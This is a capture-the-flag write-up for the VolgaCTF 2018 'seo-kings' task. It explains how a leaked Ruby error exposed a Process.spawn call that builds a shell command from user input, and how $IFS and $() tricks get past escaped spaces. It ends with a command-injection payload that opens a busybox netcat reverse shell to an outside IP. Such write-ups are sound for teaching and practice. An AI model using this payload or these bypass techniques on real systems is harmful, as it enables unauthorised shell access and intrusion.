Tags: command_injection
Rating: 5.0
The site exposes SEO service which requests like this:
```
POST http://seo-kings.quals.2018.volgactf.ru:8080/ HTTP/1.1
Host: seo-kings.quals.2018.volgactf.ru:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
site=<my_url>
```
If an array is given as `site` parameter, like `site[]=`, the server emits an error:
```
NoMethodError at /
undefined method `gsub' for [""]:Array
file: rfc2396_parser.rb location: escape line: 305
```
And guess what? Some partial source code is revealed in the error message, and there is:
```
/opt/seo-kings/app/controllers/main_controller.rb in runAdmin
pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'")
/opt/seo-kings/app/controllers/main_controller.rb in block in <class:MainController>
runAdmin(site)
```
Look at **`pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'")`**. `site` is user input, and by URI.escape, '(0x27) is not escaped! So there is a command injection vulnerability.
Since all spaces including %20, %09-%0c and [], {} are escaped (and dollar sign is not escaped), I could use $IFS to make spaces in the command. Like, `ls$IFS-al`.
But if non-first arguments doesn't start with non-alphanumeric characters, it'll become like this:
```
nc 1.2.3.4 -> nc$IFS1.2.3.4 ?
$IFS1 is not defined, so it'll become nc .2.3.4.
```
Fortunately `()` is not escaped, so we can do like this:
```
nc$IFS$()1.2.3.4
```
$() is the output of empty command, which is zero-length character. It was used to separate IFS and other characters.
The final payload:
```
site=';busybox$IFS$()nc$IFS$()1.2.3.4$IFS$()10000$IFS$()-esh;'
```
After obtaining shell, I saw .bash_history in the user directory, which has this:
```
vi file_wiht_flag.rb
```
I ran `find / -name file_wiht_flag.rb`, and there was:
```
...
'VolgaCTF{hope_it_was_like_madness}'
...
```